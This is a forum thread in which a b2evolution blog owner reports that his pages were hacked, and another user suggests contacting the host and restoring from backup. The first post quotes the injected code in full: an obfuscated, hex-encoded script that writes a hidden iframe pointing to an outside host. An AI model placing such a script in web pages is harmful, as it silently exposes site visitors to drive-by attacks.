My b2evolution Version: 1.9.x
Today I noticed that the other day my blog pages have changed: index.php, default.php etc
A whole bunch of links to www.phpbb.com/phpBB2.old/cache/template/online/ (that don't exist) and a script block:
<script>function v4702fcd4894f2(v4702fcd48a4cf){ function v4702fcd48b4ac () {var v4702fcd48c49e=16; return v4702fcd48c49e;} return(parseInt(v4702fcd48a4cf,v4702fcd48b4ac()));}function v4702fcd48d47c(v4702fcd48e46c){ function v4702fcd4913d9 () {var v4702fcd4923ad=2; return v4702fcd4923ad;} var v4702fcd48f462='';for(v4702fcd490411=0; v4702fcd490411<v4702fcd48e46c.length; v4702fcd490411+=v4702fcd4913d9()){ v4702fcd48f462+=(String.fromCharCode(v4702fcd4894f2(v4702fcd48e46c.substr(v4702fcd490411, v4702fcd4913d9()))));}return v4702fcd48f462;} document.write(v4702fcd48d47c('3C5343524950543E77696E646F772E7374617475733D27446F6E65273B646F63756D656E742E777269746528273C696672616D65206E616D653D63207372633D5C27687474703A2F2F6D792D706167652D64652E696E666F2F696E2E6367693F64656661756C743F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A313436313630292B273836665C272077696474683D333438206865696768743D343230207374796C653D5C27646973706C61793A206E6F6E655C273E3C2F696672616D653E27293C2F5343524950543E'));</script>
Obviously I've been hacked, but the last security alert said that 1.9.x was OK???
What's the best way to get things back to normal? Update to 2.x?? (I was planning to just have not had time yet)
The other odd thing is that I also run Gallery which has had it's main page deleted. I use links to gallery images in the blog... are these attacks connected and is there something I can do to help prevent them?
Thanks,
Perry
Perry,
If you've been hacked and you've noticed code/links injected into your b2evo blog pages, you might be interested in reading [url=http://randsco.com/news.php/2007/06/25/west_coast_hacked]THIS[/url], as we were hacked in a similar fashion.
Firstly, it's probably nothing to do with b2evo and more to do with your host provider. Check to see if OTHER FILES have been similarly affected (for us, it was any .php, .html and .htm file). Also, you can use tools to see if OTHER PEOPLE on your HOST'S SERVER are affected (chances are, if your account was hacked, others on the shared server were hacked too ... assuming you're on a shared server).
Our fix was simple.
We contacted our host and requested that our whole site be backed up from the latest backup (about a week old) ... so there wasn't much loss of data.
Hope this helps.